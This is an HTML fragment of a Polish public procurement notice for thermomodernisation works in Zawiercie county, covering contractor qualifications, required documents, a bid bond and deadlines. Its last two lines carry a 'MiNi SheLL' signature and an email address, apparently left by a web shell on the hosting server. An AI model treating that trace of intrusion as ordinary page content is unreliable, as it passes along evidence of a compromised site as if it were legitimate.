class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>rozdziale VIII SWZ, oraz spełniają<br/>określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w tym zakresie, jeżeli:<br/>a) wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał należycie co najmniej 2 roboty budowlane w tym:<br/>jedną (1) robotę budowlaną polegającą na wykonaniu termomodernizacji obiektu kubaturowego (budynku) wraz z montażem<br/>kompletnej instalacji centralnego ogrzewania z pompą ciepła, jako źródła ciepła, w ramach budowy, rozbudowy lub remontu<br/>obiektu kubaturowego o wartości robót co najmniej 800 000,00 PLN brutto<br/>oraz<br/>jedną (1) robotę budowlaną w zakresie instalacji sieci internetowych i komputerowych wraz z wdrożeniem systemów<br/>teleinformatycznych o wartości robót co najmniej 100 000,00 PLN brutto<br/>lub wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie wykonał należycie trzy (3) roboty budowlane w tym:<br/>jedną (1) robotę budowlaną polegającą na wykonaniu robót budowlanych w ramach termomodernizacji budynku o wartości<br/>co najmniej 700 000,00 PLN brutto<br/>oraz<br/>jedną (1) robotę budowlaną polegającą na wykonaniu kompletnej instalacji co wraz z pompą ciepła w ramach budowy,<br/>rozbudowy lub remontu obiektu kubaturowego o wartości robót co najmniej 100 000,00 PLN brutto,<br/>oraz<br/>jedną (1) robotę budowlaną w zakresie instalacji sieci internetowych i komputerowych wraz z wdrożeniem systemów<br/>teleinformatycznych o wartości robót co najmniej 100 000,00 PLN brutto<br/>Oraz<br/>b) wykaże, że skieruje do realizacji przedmiotu zamówienia osoby posiadające prawo do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie:<br/>􀀁􀀁 kierownika budowy – co najmniej jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno – budowlanej bez ograniczeń i posiadającą doświadczenie w kierowaniu lub nadzorowaniu robót<br/>budowlanych w ramach co najmniej 1 budowy, rozbudowy, przebudowy lub remontu obiektu kubaturowego wraz z jego termomodernizacją. Doświadczenie kierownika budowy będzie punktowane w ramach pozacenowego kryterium oceny ofert<br/>- zgodnie z zapisami Rozdz. XX niniejszej SWZ<br/>􀀁􀀁 kierownika robót branży sanitarnej – co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania<br/>robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wentylacyjnych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń,<br/>􀀁􀀁 kierownika robót branży elektrycznej – co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania<br/>robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń.,<br/>􀀁􀀁 kierownika robót branży telekomunikacyjnej – co najmniej jedną osobę posiadającą uprawnienia budowlane do<br/>kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń<br/>􀀁􀀁 kierownika robót branży drogowej– co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania<br/>robotami<br/>w specjalności inżynieryjnej drogowej bez ograniczeń.<br/>Uprawnienia w/w osób winny być potwierdzone stosownymi decyzjami, o których mowa w art. 12 ust. 2 (z uwzględnieniem<br/>art. 104) ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub równoważne tzn. odpowiadające im uprawnienia budowlane,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>UWAGA: W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach,<br/>na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy<br/>z dnia z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa.<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust. 2 - zgodnie z<br/>Załącznikiem nr 9 do SWZ.<br/>5. Zamawiający dopuszcza łączenie funkcji, zgodnie z posiadanymi kwalifikacjami przez jedną osobę, przy czym Kierownik<br/>budowy może pełnić co najwyżej 2 funkcje np. Kierownik budowy i Kierownik robót w branży konstrukcyjno-budowlanej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie<br/>Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, w postępowaniu,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do Rejestru lub ewidencji;<br/>3) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o<br/>którym mowa powyżej składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa<br/>powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej<br/>zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem<br/>samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich<br/>rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli Wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wykaz powinien<br/>zawierać informacje potwierdzające spełnienie warunku określonego w Rozdz. VIII ust. 1 pkt. 4 lit. a) SWZ zgodnie z wzorem<br/>stanowiącym Załącznik nr 5 do SWZ;<br/>2)wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami Wykaz powinien zawierać<br/>informacje potwierdzające spełnienie warunku określonego w Rozdz. VIII ust. 1 pkt. 4 lit. b) SWZ zgodnie z wzorem stanowiącym -<br/>Załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta powinna zawierać:<br/>1) Formularz ofertowy – wzór stanowi Załącznik nr 1 do SWZ<br/>2) Kosztorys ofertowy dla Etapu I sporządzony metodą kalkulacji uproszczonej na podstawie przedmiaru robót<br/>stanowiącego Załącznik nr 2a do SWZ<br/>3) Kosztorys ofertowy dla Etapu II sporządzony metodą kalkulacji uproszczonej na podstawie przedmiaru robót<br/>stanowiącego Załącznik nr 2b do SWZ<br/>4) Oświadczenie (lub oświadczenia), o którym mowa w art. 125 – odpowiednio w zakresie wskazanym przez<br/>Zamawiającego w Rozdziale X pkt 1 SWZ, stanowiącym wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu wzór stanowi Załącznik nr 3 do SWZ.<br/>5) Pełnomocnictwo – w przypadku podpisania oferty przez osobę upoważnioną na podstawie pełnomocnictwa lub w<br/>przypadku wykonawców występujących wspólnie,<br/>6) jeśli Wykonawca korzysta z zasobów innych podmiotów na zasadach określonych w art. 118 ustawy Pzp - dokument (np.<br/>zobowiązanie) podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów (wg wzoru stanowiącego Załącznik nr 8 do SWZ),<br/>7) w przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia - oświadczenie, z<br/>którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy (wg wzoru stanowiącego Załącznik nr 9 do<br/>SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 30 000 PLN (słownie: trzydzieści<br/>tysięcy złotych i 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniężnej;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniężnej należy wpłacić przelewem na konto w Banku:<br/>BNP Paribas Bank Polska nr rachunku 63 1600 1462 1896 9821 9000 0004<br/>tytuł wpłaty: „Wadium – Termomodernizacja Znak sprawy SRZP261-0011/2022”<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>ustawie PZP<br/>2) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest Zamawiający: Powiat Zawierciański - Starostwo Powiatowe w Zawierciu, ul.<br/>Sienkiewicza 34, 42-400 Zawiercie;<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga, aby<br/>poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo lub inny dokument, z którego wynika ustanowienie pełnomocnika winno być załączone do<br/>oferty w formie elektronicznej, zgodnie z zapisami zawartymi w Rozdz. XIV niniejszej SWZ. Ustanowienie pełnomocnika może wynikać dokumentu pełnomocnictwa lub innego dokumentu np. umowy regulującej współpracę wykonawców (umowa<br/>konsorcjum, umowa spółki cywilnej)<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy, zgodnie z Załącznikiem nr 9 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 Pzp oraz wskazanym w Załączniku nr 7 do SWZ.<br/>Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/cuw_zawiercie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-22 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W zawiązku z utrzymującym się problemem technicznym platformy e-Zamówienia (Zgłoszenie problemu nr 37227) i pilną potrzebą wszczęcia postępowania niniejsze Ogłoszenie w miejscu do tego wskazanym nie zawiera informacji, że postępowanie w imieniu i na rzecz Zamawiającego jest prowadzone przez Centrum Usług Wspólnych w Zawierciu, adres: ul Sienkiewicza 34, 42-400 Zawiercie, REGON: 385525891, tel. 32 671 07 65, e-mail: sekretariat@cuw-zawiercie.pl, strona internetowa: http://www.cuw-zawiercie.4bip.pl/

Creat By MiNi SheLL
Email: jattceo@gmail.com